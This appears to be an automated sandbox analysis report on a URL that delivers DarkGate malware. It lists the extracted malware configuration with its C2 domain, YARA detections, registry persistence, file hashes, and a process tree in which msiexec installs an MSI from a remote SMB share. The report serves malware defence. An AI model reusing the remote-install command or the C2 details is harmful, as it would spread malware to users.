Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1805s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
27/02/2024, 16:32
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://wordonlinestorage.com
Resource
win11-20240221-en
General
-
Target
http://wordonlinestorage.com
Malware Config
Extracted
darkgate
admin888
remasterprodelherskjs.com
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
kiQRLFmc
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 11 IoCs
resource yara_rule behavioral1/memory/1600-216-0x0000000005E20000-0x000000000616F000-memory.dmp family_darkgate_v6 behavioral1/memory/432-227-0x0000000002630000-0x0000000002DD2000-memory.dmp family_darkgate_v6 behavioral1/memory/1600-232-0x0000000005E20000-0x000000000616F000-memory.dmp family_darkgate_v6 behavioral1/memory/432-236-0x0000000002630000-0x0000000002DD2000-memory.dmp family_darkgate_v6 behavioral1/memory/1168-241-0x0000000002510000-0x0000000002CB2000-memory.dmp family_darkgate_v6 behavioral1/memory/432-242-0x0000000002630000-0x0000000002DD2000-memory.dmp family_darkgate_v6 behavioral1/memory/432-243-0x0000000002630000-0x0000000002DD2000-memory.dmp family_darkgate_v6 behavioral1/memory/432-245-0x0000000002630000-0x0000000002DD2000-memory.dmp family_darkgate_v6 behavioral1/memory/1168-249-0x0000000002510000-0x0000000002CB2000-memory.dmp family_darkgate_v6 behavioral1/memory/432-250-0x0000000002630000-0x0000000002DD2000-memory.dmp family_darkgate_v6 behavioral1/memory/1168-251-0x0000000002510000-0x0000000002CB2000-memory.dmp family_darkgate_v6 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 1600 created 3824 1600 Autoit3.exe 105 PID 432 created 3676 432 GoogleUpdateCore.exe 46 PID 432 created 3676 432 GoogleUpdateCore.exe 46 PID 432 created 3036 432 GoogleUpdateCore.exe 49 -
Executes dropped EXE 2 IoCs
pid Process 2720 iTunesHelper.exe 1600 Autoit3.exe -
Loads dropped DLL 2 IoCs
pid Process 2276 MsiExec.exe 2720 iTunesHelper.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2680 ICACLS.EXE 4840 ICACLS.EXE -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 3824 msiexec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\bhbHCDc = "C:\\ProgramData\\fgafcad\\Autoit3.exe C:\\ProgramData\\fgafcad\\hkafbhd.a3x" GoogleUpdateCore.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File created C:\Windows\SystemTemp\~DF056B0724DA827F0A.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF42CC6D97F31E86C1.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{3FEDD42F-832E-495B-A157-E5BB940CC16D} msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF21CF1AB7DA971C22.TMP msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIC41.tmp msiexec.exe File created C:\Windows\Installer\e5b0849.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\e5b0849.msi msiexec.exe File created C:\Windows\SystemTemp\~DFC915F854C5FA0A2F.TMP msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004b52018b2f23ece20000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004b52018b0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004b52018b000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4b52018b000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004b52018b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133535251363749336" chrome.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1628 chrome.exe 1628 chrome.exe 2996 msiexec.exe 2996 msiexec.exe 1600 Autoit3.exe 1600 Autoit3.exe 1600 Autoit3.exe 1600 Autoit3.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 432 GoogleUpdateCore.exe 1168 GoogleUpdateCore.exe 1168 GoogleUpdateCore.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 432 GoogleUpdateCore.exe 1168 GoogleUpdateCore.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 1628 chrome.exe Token: SeCreatePagefilePrivilege 1628 chrome.exe Token: SeShutdownPrivilege 3824 msiexec.exe Token: SeIncreaseQuotaPrivilege 3824 msiexec.exe Token: SeSecurityPrivilege 2996 msiexec.exe Token: SeCreateTokenPrivilege 3824 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3824 msiexec.exe Token: SeLockMemoryPrivilege 3824 msiexec.exe Token: SeIncreaseQuotaPrivilege 3824 msiexec.exe Token: SeMachineAccountPrivilege 3824 msiexec.exe Token: SeTcbPrivilege 3824 msiexec.exe Token: SeSecurityPrivilege 3824 msiexec.exe Token: SeTakeOwnershipPrivilege 3824 msiexec.exe Token: SeLoadDriverPrivilege 3824 msiexec.exe Token: SeSystemProfilePrivilege 3824 msiexec.exe Token: SeSystemtimePrivilege 3824 msiexec.exe Token: SeProfSingleProcessPrivilege 3824 msiexec.exe Token: SeIncBasePriorityPrivilege 3824 msiexec.exe Token: SeCreatePagefilePrivilege 3824 msiexec.exe Token: SeCreatePermanentPrivilege 3824 msiexec.exe Token: SeBackupPrivilege 3824 msiexec.exe Token: SeRestorePrivilege 3824 msiexec.exe Token: SeShutdownPrivilege 3824 msiexec.exe Token: SeDebugPrivilege 3824 msiexec.exe Token: SeAuditPrivilege 3824 msiexec.exe Token: SeSystemEnvironmentPrivilege 3824 msiexec.exe Token: SeChangeNotifyPrivilege 3824 msiexec.exe Token: SeRemoteShutdownPrivilege 3824 msiexec.exe Token: SeUndockPrivilege 3824 msiexec.exe Token: SeSyncAgentPrivilege 3824 msiexec.exe Token: SeEnableDelegationPrivilege 3824 msiexec.exe Token: SeManageVolumePrivilege 3824 msiexec.exe Token: SeImpersonatePrivilege 3824 msiexec.exe Token: SeCreateGlobalPrivilege 3824 msiexec.exe Token: SeBackupPrivilege 2836 vssvc.exe Token: SeRestorePrivilege 2836 vssvc.exe Token: SeAuditPrivilege 2836 vssvc.exe Token: SeBackupPrivilege 2996 msiexec.exe Token: SeRestorePrivilege 2996 msiexec.exe Token: SeRestorePrivilege 2996 msiexec.exe Token: SeTakeOwnershipPrivilege 2996 msiexec.exe Token: SeRestorePrivilege 2996 msiexec.exe Token: SeTakeOwnershipPrivilege 2996 msiexec.exe Token: SeBackupPrivilege 3192 srtasks.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 3824 msiexec.exe 3824 msiexec.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe 1628 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 836 1628 chrome.exe 43 PID 1628 wrote to memory of 836 1628 chrome.exe 43 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 2628 1628 chrome.exe 83 PID 1628 wrote to memory of 1832 1628 chrome.exe 84 PID 1628 wrote to memory of 1832 1628 chrome.exe 84 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 PID 1628 wrote to memory of 1232 1628 chrome.exe 85 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://wordonlinestorage.com1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffe7a59758,0x7fffe7a59768,0x7fffe7a597782⤵PID:836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:22⤵PID:2628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:82⤵PID:1832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:82⤵PID:1232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:12⤵PID:2748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:12⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:12⤵PID:2556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:82⤵PID:796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:82⤵PID:1088
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:3676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3036
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1168
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:1724
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1564
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" \\147.45.197.186\share\dark.vbs1⤵PID:1976
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "\\147.45.197.186\share\scan.msi"1⤵
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3824 -
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:432
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 456212F71EA4632926A9D5CE0522ECE62⤵
- Loads dropped DLL
PID:2276 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:2680
-
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:4464
-
-
C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe"C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2720 -
\??\c:\temp\Autoit3.exe"c:\temp\Autoit3.exe" c:\temp\script.a3x4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files"3⤵PID:1556
-
-
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\." /SETINTEGRITYLEVEL (CI)(OI)LOW3⤵
- Modifies file permissions
PID:4840
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52ddafd05722be6d7cd6cc73b5b98142a
SHA12c18d7c72f940140c1155e5a3da2d3443dadd5a1
SHA25689b10fd9514d79cf3bbb2bad41cc9fc76ca78f21310d9b906c80a5c8fd5b9215
SHA512cae4810a6ef0d47096792df94d1eac2bc9d340b0202c58902606ee8f956a2438063b65d230e396dbc07e8e695ba5bea18f07a0254196af3778544aed167a60f9
-
Filesize
478KB
MD50fe411da1e0ec15bd5a9d7a385454502
SHA1b57230f44e5f1f091a971047ce995598c665bd7d
SHA256def9a66ba72c77a74ed784d52454bb00d7eb1f4442ccdb87f6c7972d2ad55cd0
SHA512f991d33288ab685a61e31c5bdf5e53966de433d2c11cbe8e1de7ad2d3bdfec899fccc29d5571f97bf34f111c8425da325d86a5b2345c2ce9658bbe2972ef6cf7
-
Filesize
1KB
MD52187a02147df1d557f95028a4d25befe
SHA1eafe8cb707cee3180e2b84cf9efefcdad1c2be6a
SHA256684eb7b267d8e80823d292c514c024cee1bdf8866d1098d03bd624084cdda358
SHA512f548eb9038255a4ac8b002bdaaab1ac4bc49f151331f4a4a54a92586be7ab679bb0bc3b07ccce6909a4349c6ec1c5c6908703ff98969bf82262812680834300d
-
Filesize
6KB
MD54321102b6d869430923dee4da8edc06f
SHA151d0e98e030d0fa59545e49eb80080311db6daeb
SHA25657e20a1a9b2255f8aa6920ca1b36f2deda1776476cc6d0b3e918df10f954c285
SHA512056a839c3b58b14525c54be231069311860d346e2be8b398a18c235c2b0351133b5ae4a0db0b5ceb4e87e5aa2b15e80ecf2e517c651080f1c2d059067e3ffc88
-
Filesize
6KB
MD58b8b9be4d6657faba71816a93f8e6961
SHA1991c53ff7aa4615ee66d9c540238856e20e7814a
SHA256fa414219c39a964b0a2f7e8ce23fb26d7d5dbc106144478b45c86939cc9afad9
SHA512ad6d81682923b01c1a08da89097eb9d4693e826f5157c7f33f8193eb3fc747ea081355f2cea748b2db751a913f799fb26bedbeb188efdc9af952720268b30719
-
Filesize
131KB
MD5d2205a408ddc2c56da534b998239bd72
